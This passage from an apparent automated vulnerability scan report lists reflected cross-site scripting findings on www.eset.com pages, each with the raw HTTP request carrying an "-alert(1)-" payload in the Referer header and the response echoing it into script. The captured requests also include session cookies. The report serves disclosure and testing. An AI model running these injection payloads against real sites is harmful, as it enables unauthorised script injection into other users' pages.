Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:41 GMT
X-Varnish: 1857996770
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=745d9"-alert(1)-"b96c10ee407";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.257. http://www.eset.com/purchase [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /purchase

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e22"-alert(1)-"2096f355350 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /purchase HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:52 GMT
X-Varnish: 1858169586
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=98e22"-alert(1)-"2096f355350";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.258. http://www.eset.com/us [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a252f"-alert(1)-"980a35ca14f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Thu, 16-Jun-2011 14:15:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168883
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a252f"-alert(1)-"980a35ca14f";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.259. http://www.eset.com/us/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c103"-alert(1)-"ae091e76540 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Thu, 16-Jun-2011 14:15:40 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168585
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=6c103"-alert(1)-"ae091e76540";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.260. http://www.eset.com/us/activate [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/activate

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72d6a"-alert(1)-"5798006d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/activate HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11168
Date: Sun, 17 Apr 2011 14:15:40 GMT
X-Varnish: 1858168645
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=72d6a"-alert(1)-"5798006d14";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.261. http://www.eset.com/us/business/products [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171a7"-alert(1)-"728ddbe3c42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/business/products HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21125
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168676
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Business";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=171a7"-alert(1)-"728ddbe3c42";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.262. http://www.eset.com/us/company [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a378a"-alert(1)-"cc718e60cd8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15330
Date: Sun, 17 Apr 2011 12:59:39 GMT
X-Varnish: 1857996636
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>A
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=a378a"-alert(1)-"cc718e60cd8";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.263. http://www.eset.com/us/company/contact [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/contact

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 183b2"-alert(1)-"80f4e4b2bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/contact HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19318
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168711
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>C
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=183b2"-alert(1)-"80f4e4b2bd";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.264. http://www.eset.com/us/company/fun-stuff [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/fun-stuff

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b04f0"-alert(1)-"e90e470ffad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/fun-stuff HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13633
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168724
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b04f0"-alert(1)-"e90e470ffad";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.265. http://www.eset.com/us/company/legal-notices [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/legal-notices

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 180f9"-alert(1)-"a6eaf5719f2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/legal-notices HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19098
Date: Sun, 17 Apr 2011 14:15:42 GMT
X-Varnish: 1858168772
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...

the next lines. */
s.pageName="";
s.server="";
s.channel="Company";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=180f9"-alert(1)-"a6eaf5719f2";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.266. http://www.eset.com/us/company/privacy-policy [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/privacy-policy

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97d8"-alert(1)-"fbe9f8cd23c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/company/privacy-policy HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
